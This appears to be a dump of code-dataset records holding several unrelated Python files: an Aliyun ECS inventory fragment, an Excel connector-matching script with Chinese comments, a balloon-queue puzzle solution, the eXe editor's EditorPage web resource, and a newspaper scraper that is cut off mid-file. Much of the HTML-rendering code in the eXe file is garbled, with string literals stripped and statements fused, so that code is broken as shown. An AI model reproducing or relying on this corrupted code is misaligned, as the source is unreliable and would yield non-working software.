responses:\n access_key = clt.get_access_key()\n if resp.get('Instances', {}).get('Instance', {}):\n instances = []\n for i in resp['Instances']['Instance']:\n i['Access_key'] = access_key\n instances.append(i)\n ret.extend(instances)\n return ret\n\n\n @classmethod\n @scan_page\n def get_disks(cls, page_num=1, page_size=50):\n request = DisksRequest.DescribeDisksRequest\n responses = cls.do_request(request, page_num, page_size)\n ret = []\n for clt, resp in responses:\n access_key = clt.get_access_key()\n if resp.get('Disks', {}).get('Disk', {}):\n disks = []\n for i in resp['Disks']['Disk']:\n i['Access_key'] = access_key\n disks.append(i)\n ret.extend(disks)\n return ret\n\n\nif __name__ == '__main__':\n r = ECS.get_disks()\n print(len(r))\n # import json\n # print(json.dumps(r, indent=4))\n", "repo_name": "ri0day/POW", "sub_path": "zcmdb/graphCMDB/aliyun/ecs.py", "file_name": "ecs.py", "file_ext": "py", "file_size_in_byte": 1589, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "aliyunsdkecs.request.v20140526.DescribeInstancesRequest.DescribeInstancesRequest", "line_number": 16, "usage_type": "attribute"}, {"api_name": "aliyunsdkecs.request.v20140526.DescribeInstancesRequest", "line_number": 16, "usage_type": "name"}, {"api_name": "utils.scan_page", "line_number": 14, "usage_type": "name"}, {"api_name": "aliyunsdkecs.request.v20140526.DescribeDisksRequest.DescribeDisksRequest", "line_number": 33, "usage_type": "attribute"}, {"api_name": "aliyunsdkecs.request.v20140526.DescribeDisksRequest", "line_number": 33, "usage_type": "name"}, {"api_name": "utils.scan_page", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "12802599356", "text": "#-*- coding:utf-8 -*-\n#本程式可實現將GPK_MC CSCC中的料號填入Connector list\n#且對於同功能名稱但有不同接頭的情況進行比對區分\n#模糊比對採用find()函式手法, 缺點:無法比對同功能名稱,但字串順序不同的狀況\n#模糊比對增加set()函式手法, 可比對同功能名稱但字串順序不同的狀況\n#增加端子比對功能\n#4.2.1T版本追加: 如果端子廠商比對結果不同,就把儲存格反紅\n#追加資料夾路徑指示\n#適用python2.7 & python3.4\n\nimport openpyxl\nimport re\nfrom datetime import datetime\nfrom openpyxl.styles import PatternFill\n\nColor_red=PatternFill(fgColor='DC143C', fill_type=\"darkUp\") #作用為如果廠商不同廠,可把儲存格顏色反紅\nnum=0\ndef loadExcel(filename): #返回某個EXCEL檔案的所有sheet的串列\n wb=openpyxl.load_workbook(filename)\n sheetname=wb.get_sheet_names()\n return wb,sheetname\n\ndef theSameName(dit,key, getsheet,i, next_line,col_num,col_maker ):\n j=0\n while getsheet.cell(row=i+next_line+j, column=col_num).value is not None:\n if getsheet.cell(row=i+next_line+j, column=col_num).value.startswith('H:'):\n #比對正確就把接頭料號與廠商名稱加入該鍵的串列\n dit[key].append(getsheet.cell(row=i+next_line+j, column=col_num).value.lstrip('H:').strip())\n dit[key].append(getsheet.cell(row=i+next_line+j, column=col_maker).value)\n\n T13_theSame = getsheet.cell(row=i+next_line+j+1, column=col_num).value\n HT25_theSame = getsheet.cell(row=i+next_line+j+1, column=col_maker).value #原廠端子廠商\n if T13_theSame is None:\n pass\n else:\n k=1\n while T13_theSame is not None:\n if T13_theSame.startswith(\"T:\"):\n break\n else:\n T13_theSame = getsheet.cell(row=i+next_line+j+1+k, column=col_num).value #原廠端子料號\n HT25_theSame = getsheet.cell(row=i+next_line+j+1+k, column=col_maker).value #原廠端子廠商\n k += 1\n\n dit[key].append(T13_theSame)\n dit[key].append(HT25_theSame)\n else:\n pass\n j +=1\n return dit\n\n# cscc()的格式為cscc(字典檔,i, Excel_sheet,功能名稱的欄號, 接頭料號的欄號,製造商的欄號)\ndef cscc(dit,i, getsheet,col_function,col_num,col_maker ):\n \n if getsheet.cell(row=i, column=col_function).value is None: #column=12欄位是功能名稱\n pass\n else:\n if getsheet.cell(row=i, column=col_function).value.upper().strip().replace('_',' ').replace('-',' ') not in dit: #如果功能名稱未出現在CSSS_CONN_NAME中,此功能名稱鍵還未被創立\n #將字串轉換成大寫,移除前後換行空白字元,底線換成空格,中線換成空格\n L12=getsheet.cell(row=i, column=col_function).value.upper().strip().replace('_',' ').replace('-',' ') \n H13 = getsheet.cell(row=i+1, column=col_num).value # 原廠膠盒料號\n # 如果H13是空字符,那就將H13由原本指定的列數再往下一列,其餘元素跟著往下偏移\n if H13 is None: \n H13 = getsheet.cell(row=i+2, column=col_num).value.lstrip('H:') #原廠膠盒料號\n HF25 = getsheet.cell(row=i+2, column=col_maker).value #原廠膠盒廠商\n T13 = getsheet.cell(row=i+3, column=col_num).value #原廠端子料號\n HT25 = getsheet.cell(row=i+3, column=col_maker).value #原廠端子廠商\n if T13 is None:\n pass\n else:\n j=1 #while迴圈迭代器\n #如果T13不是以T:開頭,就再往下一行搜尋\n while T13 is not None:\n if T13.startswith(\"T:\"):\n break\n else:\n T13 = getsheet.cell(row=i+3+j, column=col_num).value #原廠端子料號\n HT25 = getsheet.cell(row=i+3+j, column=col_maker).value #原廠端子廠商\n j += 1\n \n # cscc_conn_name[接頭名稱]={ 膠盒料號, 廠商, 端子料號,廠商} \n dit[L12]=[H13,HF25,T13,HT25]\n #如果原行數下一行的值非\"None\",比對其是否以H:開頭,如果是就加入list中\n theSameName(dit,L12, getsheet,i,4,col_num,col_maker)\n \n else: #如果H13不是None, 就不用往下偏移\n HF25 = getsheet.cell(row=i+1, column=col_maker).value # 原廠膠盒廠商\n T13 = getsheet.cell(row=i+2, column=col_num).value #原廠端子料號\n HT25 = getsheet.cell(row=i+2, column=col_maker).value #原廠端子廠商\n if T13 is None:\n pass\n else:\n j=1 #while迴圈迭代器\n while T13 is not None:\n if T13.startswith(\"T:\"):\n break\n else:\n T13 = getsheet.cell(row=i+2+j, column=col_num).value #原廠端子料號\n HT25 = getsheet.cell(row=i+2+j, column=col_maker).value #原廠端子廠商\n j += 1 \n # cscc_conn_name[接頭名稱]={ 膠盒料號, 廠商, 端子料號,廠商} \n dit[L12]= [H13.lstrip('H:'),HF25,T13,HT25]\n theSameName(dit, L12, getsheet, i, 2,col_num,col_maker)\n\n else: # 功能名稱已在CSCC字典中,改為添加值\n L12=getsheet.cell(row=i, column=col_function).value.upper().strip().replace('_',' ').replace('-',' ')\n H13 = getsheet.cell(row=i + 1, column=col_num).value # 原廠膠盒料號\n # 如果H13是空字符,那就將H13由原本指定的列數再往下一列,其餘元素跟著往下偏移\n if H13 is None:\n H13 = getsheet.cell(row=i + 2, column=col_num).value.lstrip('H:') #原廠膠盒料號\n HF25 = getsheet.cell(row=i + 2, column=col_maker).value #原廠膠盒廠商\n T13 = getsheet.cell(row=i+3, column=col_num).value #原廠端子料號\n HT25 = getsheet.cell(row=i+3, column=col_maker).value #原廠端子廠商\n if T13 is None:\n pass\n else:\n j=1 #while迴圈迭代器\n #如果T13不是以T:開頭,且不是None,就再往下一行搜尋\n while T13 is not None:\n if T13.startswith(\"T:\"):\n break\n else:\n T13 = getsheet.cell(row=i+3+j, column=col_num).value #原廠端子料號\n HT25 = getsheet.cell(row=i+3+j, column=col_maker).value #原廠端子廠商\n j += 1\n # cscc_conn_name[接頭名稱]={ 膠盒料號, 廠商, 端子料號,廠商}\n dit[L12].append(H13)\n dit[L12].append(HF25)\n dit[L12].append(T13)\n dit[L12].append(HT25)\n print(\"The connector %s append %s\" % (L12, (HF25+' '+H13))) \n # 如果原行數下一行的值非\"None\",比對其是否以H:開頭,如果是就加入list中\n theSameName(dit, L12, getsheet, i, 3,col_num,col_maker)\n\n\n else: # 如果H13不是None, 就不用往下偏移\n HF25 = getsheet.cell(row=i + 1, column=col_maker).value # 原廠膠盒廠商\n T13 = getsheet.cell(row=i+2, column=col_num).value #原廠端子料號\n HT25 = getsheet.cell(row=i+2, column=col_maker).value #原廠端子廠商\n if T13 is None:\n pass\n else:\n j=1 #while迴圈迭代器\n #如果T13不是以T:開頭,且不是None,就再往下一行搜尋\n while T13 is not None:\n if T13.startswith(\"T:\"):\n break\n else:\n T13 = getsheet.cell(row=i+2+j, column=col_num).value #原廠端子料號\n HT25 = getsheet.cell(row=i+2+j, column=col_maker).value #原廠端子廠商\n j += 1 \n # cscc_conn_name[接頭名稱]={ 膠盒料號, 廠商, 端子料號,廠商}\n dit[L12].append(H13.lstrip('H:'))\n dit[L12].append(HF25)\n dit[L12].append(T13)\n dit[L12].append(HT25)\n print(\"The connector %s append %s\" % (L12, (HF25+' '+H13)))\n theSameName(dit, L12, getsheet, i, 2,col_num,col_maker)\n \n return dit\n\n#===========================以下為Connector比對專用函數=====================================\ndef cute(item):\n return item.upper().strip().replace('_', ' ').replace('-',' ')\n\ndef fuzzy(connector, dit, getsheet, i): #模糊比對\n global num\n print(\"[%s]The connector %s is in fuzzy mode\" % (i, connector))\n for csccname in dit:\n s1=set(connector.split())\n s2=set(csccname.split())\n #=========進入Find()比對模式========\n #主要解決HEAD_LAMP_RH與HEAD_LAMP會無法辨識的問題\n if len(connector) > len(csccname): #如果connector長度比cscc_name大,就以前者為基準\n\n if connector.find(csccname) >=0: #有比對出cscc_name字串出現在connector中\n print(\"[+]the connector is in (find) mode\")\n if len(dit[csccname]) >4:\n moreConnector(csccname, dit, getsheet,i)\n break\n else:\n print(\"[+]The connector in (find) is match %s\" % csccname)\n getsheet.cell(row=i, column=25).value=dit[csccname][1]\n getsheet.cell(row=i, column=26).value=dit[csccname][0].lstrip('H:')\n getsheet.cell(row=i, column=30).value=dit[csccname][3]\n getsheet.cell(row=i, column=31).value=dit[csccname][2]\n if dit[csccname][1] != dit[csccname][3] and dit[csccname][3] is not None:\n getcbsheet.cell(row=i, column=30).fill=Color_red\n num += 1\n break\n \n elif csccname.find(connector) >=0:\n print(\"[+]the connector is in (find) mode\")\n if len(dit[csccname]) >4:\n moreConnector(csccname, dit, getsheet,i)\n break \n else:\n print(\"[+]The connector in (find) is match %s\" % csccname)\n getsheet.cell(row=i, column=25).value=dit[csccname][1]\n getsheet.cell(row=i, column=26).value=dit[csccname][0].lstrip('H:')\n getsheet.cell(row=i, column=30).value=dit[csccname][3]\n getsheet.cell(row=i, column=31).value=dit[csccname][2]\n if dit[csccname][1] != dit[csccname][3] and dit[csccname][3] is not None:\n getcbsheet.cell(row=i, column=30).fill=Color_red\n num += 1\n break\n #==============進入set比對模式========== \n #此模式主要可對應RH_HEAD_Lamp與HEAD_LAMP_RH會無法辨識的問題\n #差異的部份小於三處,就視為相同,且忽略功能名稱字串小於兩個的項目 \n elif len(s1.symmetric_difference(s2)) <3 and len(s1)>2 and len(s2)>2 : \n print(\"[+]the connector is in (set) mode\")\n if len(dit[csccname]) > 4:\n moreConnector(csccname, dit, getsheet,i)\n break \n else: \n print(\"[+]The connectoe in (set) is find match %s\" % csccname)\n getsheet.cell(row=i, column=25).value=dit[csccname][1]\n getsheet.cell(row=i, column=26).value=dit[csccname][0].lstrip('H:')\n getsheet.cell(row=i, column=30).value=dit[csccname][3]\n getsheet.cell(row=i, column=31).value=dit[csccname][2]\n if dit[csccname][1] != dit[csccname][3] and dit[csccname][3] is not None:\n getcbsheet.cell(row=i, column=30).fill=Color_red\n num +=1\n break\n \n \n else:\n getsheet.cell(row=i, column=26).value =\"Can't match\"\n \n\n \ndef moreConnector(connector, dit, getsheet, i):\n global num\n for j in range(0, len(dit[connector]),4):\n #如果cscc字典中有鍵的值與connector list的料號相同,就指定將該鍵的值填入connector list中\n if cute((dit[connector][j+1]+' '+dit[connector][j]))==cute(getsheet.cell(row=i, column=18).value):\n getsheet.cell(row=i, column=25).value=dit[connector][j+1]\n getsheet.cell(row=i, column=26).value=dit[connector][j].lstrip('H:')\n getsheet.cell(row=i, column=30).value=dit[connector][j+3]\n getsheet.cell(row=i, column=31).value=dit[connector][j+2]\n print(\"[%s]find connector %s match cscc,and is %s\" % (i,connector,(dit[connector][j+1]+' '+dit[connector][j])) )\n if dit[connector][j+1] != dit[connector][j+3] and dit[connector][j+3] is not None:\n getcbsheet.cell(row=i, column=30).fill=Color_red\n num += 1\n break\n #否則就比對connector_list的接頭孔數(column=16(P))是否與cscc中的日產編號型式相同,是的話填入connector_list中(意指廠商使用LOCAL件)\n elif int(getsheet.cell(row=i, column=16).value) == int(re.findall(r'\\w*(\\d\\d)\\D*',dit[connector][j])[0]):\n getsheet.cell(row=i, column=25).value=dit[connector][j+1]\n getsheet.cell(row=i, column=26).value=dit[connector][j].lstrip('H:')\n getsheet.cell(row=i, column=30).value=dit[connector][j+3]\n getsheet.cell(row=i, column=31).value=dit[connector][j+2]\n print(u\"[%s]find connector %s match 日產編號 cscc,and is %s\" % (i,connector,(dit[connector][j+1]+' '+dit[connector][j])))\n if dit[connector][j+1] != dit[connector][j+3] and dit[connector][j+3] is not None:\n getcbsheet.cell(row=i, column=30).fill=Color_red\n num += 1\n break\n else:\n pass\n\n\n\n#================載入樂榮CSCC ============\nData_local=\"c:\\\\Python34\\\\DATA\\\\\"\nCSCC_Name=['24010-KN711-CSCC-D.xlsx', '24012-KN711-CSCC-161214.xlsx',\n '24068-KN711-CSCC-161214.xlsx','24023-KN711-CSCC-170307.xlsx']\nprint(\"創建Excel物件....CSCC\")\ncscc_conn={}\nfor CsccName in CSCC_Name:\n print(\"載入 %s\" % (Data_local+CsccName))\n wb, sheetname=loadExcel(Data_local+CsccName)\n for shet in sheetname:\n getsheet=wb.get_sheet_by_name(shet)\n for i in range(25, int(getsheet.max_row)+1):\n cscc_conn=cscc(cscc_conn, i, getsheet,12,13,25)\n\n#================載入矢崎CSCC==============\nCsccName1='24011-KN711-CSCC-161104.xlsx'\nprint(\"載入 %s ...\" % (Data_local+CsccName1))\nwb3,sheetname3=loadExcel(Data_local+CsccName1)\ngetsheet3=wb3.get_sheet_by_name(sheetname3[0])\nfor i in range(25, int(getsheet3.max_row)+1):\n cscc_conn=cscc(cscc_conn,i,getsheet3,14,15,27)\n\n#===============比對Connector List與cscc內容=======\nconnector_list='GPKMC_Connector list_R-2_NEW2.xlsx'\nprint(\"載入 %s\" % (Data_local+connector_list))\nwb2,sheet2=loadExcel(Data_local+connector_list)\ngetcbsheet=wb2.get_sheet_by_name(sheet2[0])\nfor i in range(4, int(getcbsheet.max_row)+1):\n if getcbsheet.cell(row=i, column=10).value is None: #如果功能名稱是None,就跳過\n pass\n else:\n JS10=cute(getcbsheet.cell(row=i, column=10).value)\n # 如果 connector list的功能名稱有出現在cscc字典中\n if JS10 in cscc_conn:\n if len(cscc_conn[JS10]) > 4: #如果len >4 代表有複數顆接頭\n moreConnector(JS10, cscc_conn, getcbsheet,i)\n else: #len沒有大於3,代表接頭與料號為一對一的關係\n getcbsheet.cell(row=i, column=25).value=cscc_conn[JS10][1]\n getcbsheet.cell(row=i, column=26).value=cscc_conn[JS10][0].lstrip('H:')\n getcbsheet.cell(row=i, column=30).value=cscc_conn[JS10][3]\n getcbsheet.cell(row=i, column=31).value=cscc_conn[JS10][2]\n print(\"[%s]find connector %s match cscc\" % (i,JS10))\n if cscc_conn[JS10][1] != cscc_conn[JS10][3] and cscc_conn[JS10][3] is not None:\n getcbsheet.cell(row=i, column=30).fill=Color_red\n num += 1 \n\n else: #如果功能名稱不在cscc中,就進入模糊比對\n fuzzy(JS10,cscc_conn,getcbsheet,i)\n\nprint(\"\\n\")\nprint(str(datetime.now()))\nprint(\"Match %s items\" % num)\n\nprint(\"Save File...\")\nwb2.save(Data_local+'GPKMC_Connector list_test7T.xlsx')\nprint(\"Done\")\n", "repo_name": "cololk/python", "sub_path": "cscc_to_connector_4.2.1T.py", "file_name": "cscc_to_connector_4.2.1T.py", "file_ext": "py", "file_size_in_byte": 17491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "openpyxl.styles.PatternFill", "line_number": 16, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 19, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 247, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 312, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 312, "usage_type": "name"}]} +{"seq_id": "36377740528", "text": "from collections import deque\nN = int(input())\narr = list(map(int, input().split()))\nballoons = [i for i in range(1, N + 1)]\n\nque = deque()\nque.append((arr[0], 1))\n\nanswer = []\ncurr = 0\n\nwhile arr:\n # print(\"curr: \", curr)\n balloon = balloons.pop(curr)\n num = arr.pop(curr)\n answer.append(balloon)\n\n # print(\"after\")\n # print(arr)\n # print(balloons)\n\n length = 0\n if len(arr) == 0:\n length = 1\n else:\n length = len(arr)\n\n if num < 0:\n next = (length + curr + num) % length\n else:\n next = (curr + num - 1) % length\n\n # print(\"next: \", next)\n curr = next\n # print()\n # print(answer)\n # print()\n\nprint(*answer)\n\n''' deque, enumerate 사용\nfrom collections import deque\nn = int(input())\nq = deque(enumerate(map(int,input().split())))\nans=[]\n\nwhile q:\n idx,num = q.popleft()\n ans.append(idx+1)\n if num>0:\n q.rotate(-(num-1))\n elif num<0:\n q.rotate(-num)\n\nprint(' '.join(map(str,ans)))\n'''\n'''\n5\n-1 -1 -1 -1 -1\n\ncurr : 0\n[3, 2, 1, -3, -1]\n[1, 2, 3, 4, 5]\n(3, 1)\nnext: 3\nanswer: [1]\n\ncurr: 3\n[2, 1, -3, -1]\n[2, 3, 4, 5]\n(-3, 4)\nnext: (3-3)-1\n\n(-3, 4) \ncurr: 2 -3 = -1 => len(arr)-1=2\n[2, 1, -1]\n[2, 4, 5]\n\n(-1, 5)\ncurr: -1\n[2, 1]\n[2, 4]\n=> curr:(2-1) % len(arr)\n\n(2, 2)\n[1]\n[4]\ncurr: (2 + 2) % len(arr)\n\n'''", "repo_name": "studying-ice-bear/pparkkkimeom", "sub_path": "GimYujin/DataStruture_Queue/2346_풍선_터뜨리기.py", "file_name": "2346_풍선_터뜨리기.py", "file_ext": "py", "file_size_in_byte": 1307, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.deque", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "1777774109", "text": "import logging\nfrom twisted.web.resource import Resource\nfrom exe.webui import common\nfrom exe.engine.genericidevice import GenericIdevice\nfrom exe.webui.editorpane import EditorPane\nfrom exe.webui.renderable import RenderableResource\nfrom exe.engine.package import Package\nfrom exe.engine.path import Path\nfrom exe.engine.field import MultimediaField\nfrom cgi import escape\n\nlog = logging.getLogger(__name__)\n\n\nclass EditorPage(RenderableResource):\n \"\"\"\n The EditorPage is responsible for managing user created iDevices\n create / edit / delete\n \"\"\"\n\n name = 'editor'\n\n def __init__(self, parent):\n \"\"\"\n Initialize\n \"\"\"\n RenderableResource.__init__(self, parent)\n self.editorPane = EditorPane(self.webServer, self)\n self.url = \"\"\n self.elements = []\n self.isNewIdevice = True\n #JR: Anado esta variable para que los genericos no se puedan previsualizar\n self.isGeneric = False\n self.message = \"\"\n \n def getChild(self, name, request):\n \"\"\"\n Try and find the child for the name given\n \"\"\"\n if name == \"\":\n return self\n else:\n return Resource.getChild(self, name, request)\n\n\n def process(self, request):\n \"\"\"\n Process current package \n \"\"\"\n log.debug(\"process \" + repr(request.args))\n \n self.editorPane.process(request,\"old\")\n\n if \"action\" in request.args:\n if request.args[\"action\"][0] == \"changeIdevice\":\n genericIdevices = self.ideviceStore.generic\n if not self.isNewIdevice:\n ideviceId = self.editorPane.idevice.id\n for idevice in genericIdevices:\n if idevice.id == ideviceId:\n break\n copyIdevice = self.editorPane.idevice.clone()\n self.__saveChanges(idevice, copyIdevice)\n \n selected_idevice = request.args[\"object\"][0].decode(\"utf-8\")\n\n self.isGeneric = False\n for idevice in genericIdevices:\n if idevice.title == selected_idevice:\n self.isGeneric = True\n break\n self.isNewIdevice = False\n self.editorPane.setIdevice(idevice) \n self.editorPane.process(request, \"new\")\n \n \n if ((\"action\" in request.args and \n request.args[\"action\"][0] == \"newIdevice\")\n or \"new\" in request.args):\n self.__createNewIdevice(request)\n \n\n if (\"action\" in request.args and request.args[\"action\"][0] == \"deleteIdevice\"):\n self.ideviceStore.delIdevice(self.editorPane.idevice)\n #Lo borramos tambien de la lista factoryiDevices\n idevice = self.editorPane.idevice\n exist = False\n for i in self.ideviceStore.getFactoryIdevices():\n if i.title == idevice.title:\n idevice.id = i.id\n exist = True\n break\n if exist:\n self.ideviceStore.factoryiDevices.remove(idevice)\n self.ideviceStore.save()\n self.message = _(\"Done\")\n self.__createNewIdevice(request) \n \n if (\"action\" in request.args and \n request.args[\"action\"][0] == \"new\"):\n if self.editorPane.idevice.title == \"\":\n self.message = _(\"Please enter an idevice name.\")\n else:\n newIdevice = self.editorPane.idevice.clone()\n #TODO could IdeviceStore set the id in addIdevice???\n newIdevice.id = self.ideviceStore.getNewIdeviceId()\n self.ideviceStore.addIdevice(newIdevice)\n self.editorPane.setIdevice(newIdevice)\n self.ideviceStore.save()\n self.message = _(\"Settings Saved\")\n self.isNewIdevice = False\n \n if (\"action\" in request.args and \n request.args[\"action\"][0] == \"save\"): \n genericIdevices = self.ideviceStore.generic\n for idevice in genericIdevices:\n if idevice.title == self.editorPane.idevice.title:\n break\n copyIdevice = self.editorPane.idevice.clone()\n self.__saveChanges(idevice, copyIdevice)\n self.ideviceStore.save()\n self.message = _(\"Settings Saved\")\n \n if (\"action\" in request.args and \n request.args[\"action\"][0] == \"export\"): \n filename = request.args[\"pathpackage\"][0]\n self.__exportIdevice(filename)\n \n if (\"action\" in request.args and \n request.args[\"action\"][0] == \"import\"):\n filename = request.args[\"pathpackage\"][0]\n self.__importIdevice(filename)\n\n \n def __createNewIdevice(self, request):\n \"\"\"\n Create a new idevice and add to idevicestore\n \"\"\"\n idevice = GenericIdevice(\"\", \"\", \"\", \"\", \"\")\n idevice.icon = \"\"\n idevice.id = self.ideviceStore.getNewIdeviceId()\n self.editorPane.setIdevice(idevice)\n self.editorPane.process(request, \"new\") \n self.isNewIdevice = True\n \n def __saveChanges(self, idevice, copyIdevice):\n \"\"\"\n Save changes to generic idevice list.\n \"\"\"\n idevice.title = copyIdevice._title\n idevice.author = copyIdevice._author\n idevice.purpose = copyIdevice._purpose\n idevice.tip = copyIdevice._tip\n idevice.fields = copyIdevice.fields\n idevice.emphasis = copyIdevice.emphasis\n idevice.icon = copyIdevice.icon\n idevice.systemResources = copyIdevice.systemResources \n \n def __importIdevice(self, filename):\n \n \"\"\"\n import the idevices which are not existed in current package from another package\n \"\"\"\n try: \n newPackage = Package.load(filename)\n except:\n self.message = _(\"Sorry, wrong file format.\")\n return\n \n if newPackage: \n newIdevice = newPackage.idevices[-1].clone()\n for currentIdevice in self.ideviceStore.generic:\n if newIdevice.title == currentIdevice.title:\n newIdevice.title += \"1\"\n break\n self.ideviceStore.addIdevice(newIdevice) \n self.ideviceStore.save()\n else:\n self.message = _(\"Sorry, wrong file format.\")\n \n def __exportIdevice(self, filename):\n \"\"\"\n export the current generic idevices.\n \"\"\"\n if not filename.endswith('.idp'):\n filename = filename + '.idp'\n name = Path(filename).namebase\n package = Package(name)\n package.idevices.append(self.editorPane.idevice.clone())\n package.save(filename)\n \n \n def render_GET(self, request):\n \"\"\"Called for all requests to this object\"\"\"\n \n # Processing \n log.debug(\"render_GET\")\n self.process(request)\n \n # Rendering\n html = common.docType()\n html += \"\\n\"\n html += \"\\n\"\n html += \"\\n\"\n html += '\\n'\n html += '\\n'\n html += '\\n'\n html += \"\"+_(\"eXe : elearning XHTML editor\")+\"\\n\"\n html += \"\\n\";\n html += \"\\n\"\n html += \"\\n\"\n html += \" \\n\" \n html += \"\" \n html += common.hiddenField(\"action\")\n html += common.hiddenField(\"object\")\n html += common.hiddenField(\"isChanged\", \"1\") \n if self.message != '':\n html += \"\"\n html += \" \\n\" \n html += self.renderList()\n html += self.editorPane.renderButtons(request)\n if self.isNewIdevice:\n html += \"\" + common.submitButton(\"delete\", _(\"Delete\"), \n False)\n else:\n html += ''\n html += '' % (escape(title), _(\"Save\"))\n html += u'' % _(\"Import iDevice\")\n html += u'' % _(\"Export iDevice\")\n html += u'\\n' % _(\"Quit\")\n html += common.hiddenField(\"pathpackage\")\n html += \"\"\n html += \"\\n\"\n html += self.editorPane.renderIdevice(request)\n html += \"\\n\"\n html += \"\\n\"\n html += \"\\n\"\n html += \"\\n\"\n return html.encode('utf8')\n render_POST = render_GET\n\n\n def renderList(self):\n \"\"\"\n Render the list of generic iDevice\n \"\"\"\n html = \"\" + _(\"Edit\")+ \"\"\n html += '\\n'\n html += \"\"+ _(\"New iDevice\") + \"\"\n for prototype in self.ideviceStore.generic:\n html += \" 16:\n title = title[:16] + \"...\"\n html += \">\" + title + \"\\n\"\n\n html += \" \\n\"\n html += \"\\n\"\n self.message = \"\"\n return html\n", "repo_name": "exelearning/iteexe", "sub_path": "exe/webui/editorpage.py", "file_name": "editorpage.py", "file_ext": "py", "file_size_in_byte": 11331, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 116, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "exe.webui.renderable.RenderableResource", "line_number": 15, "usage_type": "name"}, {"api_name": "exe.webui.renderable.RenderableResource.__init__", "line_number": 27, "usage_type": "call"}, {"api_name": "exe.webui.renderable.RenderableResource", "line_number": 27, "usage_type": "name"}, {"api_name": "exe.webui.editorpane.EditorPane", "line_number": 28, "usage_type": "call"}, {"api_name": "twisted.web.resource.Resource.getChild", "line_number": 43, "usage_type": "call"}, {"api_name": "twisted.web.resource.Resource", "line_number": 43, "usage_type": "name"}, {"api_name": "exe.engine.genericidevice.GenericIdevice", "line_number": 139, "usage_type": "call"}, {"api_name": "exe.engine.package.Package.load", "line_number": 165, "usage_type": "call"}, {"api_name": "exe.engine.package.Package", "line_number": 165, "usage_type": "name"}, {"api_name": "exe.engine.path.Path", "line_number": 187, "usage_type": "call"}, {"api_name": "exe.engine.package.Package", "line_number": 188, "usage_type": "call"}, {"api_name": "exe.webui.common.docType", "line_number": 201, "usage_type": "call"}, {"api_name": "exe.webui.common", "line_number": 201, "usage_type": "name"}, {"api_name": "exe.webui.common.hiddenField", "line_number": 222, "usage_type": "call"}, {"api_name": "exe.webui.common", "line_number": 222, "usage_type": "name"}, {"api_name": "exe.webui.common.hiddenField", "line_number": 223, "usage_type": "call"}, {"api_name": "exe.webui.common", "line_number": 223, "usage_type": "name"}, {"api_name": "exe.webui.common.hiddenField", "line_number": 224, "usage_type": "call"}, {"api_name": "exe.webui.common", "line_number": 224, "usage_type": "name"}, {"api_name": "exe.webui.common.submitButton", "line_number": 231, "usage_type": "call"}, {"api_name": "exe.webui.common", "line_number": 231, "usage_type": "name"}, {"api_name": "cgi.escape", "line_number": 240, "usage_type": "call"}, {"api_name": "exe.webui.common.hiddenField", "line_number": 250, "usage_type": "call"}, {"api_name": "exe.webui.common", "line_number": 250, "usage_type": "name"}]} +{"seq_id": "19071057804", "text": "import csv\nimport os\nimport random\nimport time\nimport urllib.request\nimport glob\nfrom digi_selenium_scraper_common_functions import (\n convert_day_or_month_to_str)\nimport http\n\n\ndef read_csv_to_dictlist(csv_filename, browser):\n with open(csv_filename) as csvfile:\n papers_list = []\n csvreader = csv.reader(csvfile)\n for i in range(2):\n next(csvreader)\n for row in csvreader:\n url = row[6]\n url_common_prefix = url.split('?page=1')[0] + '/'\n binding_no = url_common_prefix.split('/')[5]\n browser.get(url)\n print('processing row with url: ' + url)\n last_page = browser.find_element_by_css_selector(\n 'div.page-navigation span.ng-binding').text\n last_page = last_page[1:]\n row_dict = {'binding_no': binding_no,\n 'title': row[0],\n 'issn': row[1],\n 'url': url,\n 'url_common_prefix': url_common_prefix,\n 'last_page': last_page}\n papers_list.append(row_dict)\n # print('processed row with url: ' + url)\n return(papers_list)\n\n\ndef write_refined_csv(day_dir, day_list, material_type):\n y_str = day_dir.split('/')[2]\n m_str = day_dir.split('/')[3]\n d_str = day_dir.split('/')[4]\n new_csv_filename = (day_dir + 'refined_' +\n material_type + '-' +\n y_str + '-' +\n m_str + '-' +\n d_str + '.csv')\n\n with open(new_csv_filename, 'w') as csvfile:\n csvwriter = csv.writer(csvfile)\n csvwriter.writerow(['binding_no',\n 'title',\n 'issn',\n 'url',\n 'url_common_prefix',\n 'last_page'])\n for item in day_list:\n csvwriter.writerow([item.get('binding_no'),\n item.get('title'),\n item.get('issn'),\n item.get('url'),\n item.get('url_common_prefix'),\n item.get('last_page')])\n\n print(\"Wrote refined csv-file for data: \" +\n y_str + \"/\" + m_str + \"/\" + d_str + \" - \" + material_type)\n\n\ndef download_items_from_day_list(day_list, day_dir, material_type,\n scrape_images=False):\n y_str = day_dir.split('/')[2]\n m_str = day_dir.split('/')[3]\n d_str = day_dir.split('/')[4]\n for item in day_list:\n url_common_prefix = item.get('url_common_prefix')\n item_dir = day_dir + item.get('binding_no')\n last_page = item.get('last_page')\n\n if not os.path.exists(item_dir):\n os.makedirs(item_dir)\n\n page_list = list(range(1, int(last_page) + 1))\n\n print(\"Getting content for binding: \" + item.get('binding_no') +\n \" - \" + y_str + \"/\" + m_str + \"/\" + d_str + \"-\" +\n material_type + \" - pages: \" + last_page)\n\n for page_number in page_list:\n page_str = str(page_number)\n text_url = url_common_prefix + \"page-\" + page_str + \".txt\"\n text_filename = item_dir + '/' + \"page-\" + page_str + \".txt\"\n alto_url = url_common_prefix + \"page-\" + page_str + \".xml\"\n alto_filename = item_dir + '/' + \"page-\" + page_str + \".xml\"\n image_url = url_common_prefix + \"image/\" + page_str\n image_filename = item_dir + '/' + \"page-\" + page_str + \".jpg\"\n\n seconds = random.random() * 0.3 + 0.5\n time.sleep(seconds)\n\n for attempt in range(1, 11):\n try:\n urllib.request.urlretrieve(text_url,\n 